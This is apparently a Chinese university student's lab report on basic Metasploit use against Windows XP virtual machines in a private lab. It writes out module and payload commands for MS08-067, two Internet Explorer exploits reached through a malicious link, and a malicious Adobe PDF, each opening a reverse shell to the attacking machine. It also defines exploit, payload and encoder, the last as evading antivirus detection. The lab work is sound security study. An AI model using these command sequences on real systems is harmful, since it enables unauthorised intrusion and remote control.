20155330 《網絡對抗》 Exp5 MSF基礎應用
阿新 • • 發佈:2018-04-29
ref 及其 smb tel 相關 windows服務 實踐 IE coo
20155330 《網絡對抗》 Exp5 MSF基礎應用
實踐過程記錄
Windows服務滲透:MS08_067漏洞攻擊
- 攻擊機:kali
- IP地址:192.168.124.132
- 靶機:windows XP SP3 簡體中文
- IP地址:192.168.124.135
- 輸入命令
use exploit/windows/smb/ms08_067_netapi
設置參數
set payload generic/shell_reverse_tcptcp反向回連 set LHOST 192.168.23.130 此IP是kali的IP set LPORT 5321 端口 set RHOST 192.168.23.142 此IP是靶機WIN XP的IP,特定漏洞端口已經固定 set target 0
- 並進行攻擊
exploit
。
- 結果失敗了。
- 然後重新換了一臺靶機windows XP SP3(English),重設了攻擊目標地址。
成功了,使用
systeminfo
查看靶機信息。
瀏覽器:MS11-050漏洞攻擊
- 攻擊機:kali
- IP地址:192.168.124.132
- 靶機:Windows XP Professional SP3 簡體中文
- IP地址:192.168.124.135
- 用
use windows/browser/ms11_050_mshtml_cobjectelement
使用該模塊 - 加載payload
set payload windows/meterpreter/reverese_http
- 在靶機中啟動IE 7瀏覽器,訪問鏈接:
http://192.168.124.132:8080/ms5330
;
- 但是在kali攻擊機中一直出錯,回連沒有成功。
然後參考組長的博客,將攻擊的目標漏洞換成了
MS10_002_aurora
。瀏覽器:MS10_002_aurora漏洞攻擊
- 攻擊機:kali
- IP地址:192.168.124.129
- 靶機:Windows XP Professional SP3(English)
- IP地址:192.168.124.136
- 輸入下圖中的命令並執行攻擊
- 在靶機中啟動IE 7瀏覽器,訪問鏈接:
http://192.168.124.132:8080/aurora.html
- 本來是回連成功的,但是輸入錯了命令,然後只好重做了一遍。
- 第二次生成了不同的網址
- 回連成功後使用
sysinfo
查看靶機信息
靶機ip地址
Adobe滲透測試
- 攻擊機:kali
- IP地址:192.168.124.129
- 靶機:Windows XP Professional SP3 簡體中文
- IP地址:192.168.124.135
- 進入
windows/fileformat/adobe_cooltype_sing
模塊設定相關系數並生成相關文件5330.pdf
- 將生成的pdf文件導入到靶機中運行,回連成功!可對靶機進行操作。
在靶機中關閉PDF文檔後,攻擊機與靶機斷開連接。
輔助模塊
- 輸入命令
show auxiliary
查看所有輔助模塊
- 選中其中一個模塊進入
show options
查看需要設置的消息,並設置必要參數
使用命令run開啟掃描,結果如下:
實驗後回答問題
- exploit
- 攻擊。簡單來說就是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊。主要分為主動攻擊和被動攻擊。
- payload
- 攻擊載荷。類似shellcode,在攻擊滲透成功後對被感染計算機進行後門操作,達到攻擊效果。
- encode
- 編碼器。修改字符達到“免殺”目的。
實驗感受
這次實驗主要對Windows xp系統及其有關應用中的部分漏洞進行了攻擊,從而也感受到了msf工具功能的強大。
20155330 《網絡對抗》 Exp5 MSF基礎應用